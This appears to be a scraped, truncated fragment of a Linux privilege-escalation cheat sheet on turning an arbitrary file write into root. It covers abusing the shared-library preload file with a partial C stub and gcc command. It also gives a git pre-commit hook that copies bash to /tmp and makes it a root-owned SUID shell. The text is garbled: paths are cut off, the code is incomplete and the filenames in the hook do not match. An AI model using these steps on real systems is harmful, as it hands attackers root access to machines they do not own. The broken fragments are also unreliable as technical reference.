Arbitrary File Write to Root


This file behaves like LD_PRELOAD env variable but it also works in SUID binaries. If you can create it or modify it, you can just add a path to a library that will be loaded with each executed binary.
For example: echo "/tmp/" > /etc/
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
//cd /tmp
//gcc -fPIC -shared -o pe.c -nostartfiles

Git hooks

Git hooks are scripts that are run on various events in a git repository ñlike when a commit is created, a merge... So if a privileged script or user is performing this actions frequently and it's possible to write in the .git folder, this can be used to privesc.
For example, It's possible to generate a script in a git repo in .git/hooks so it's always executed when a new commit is created:
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit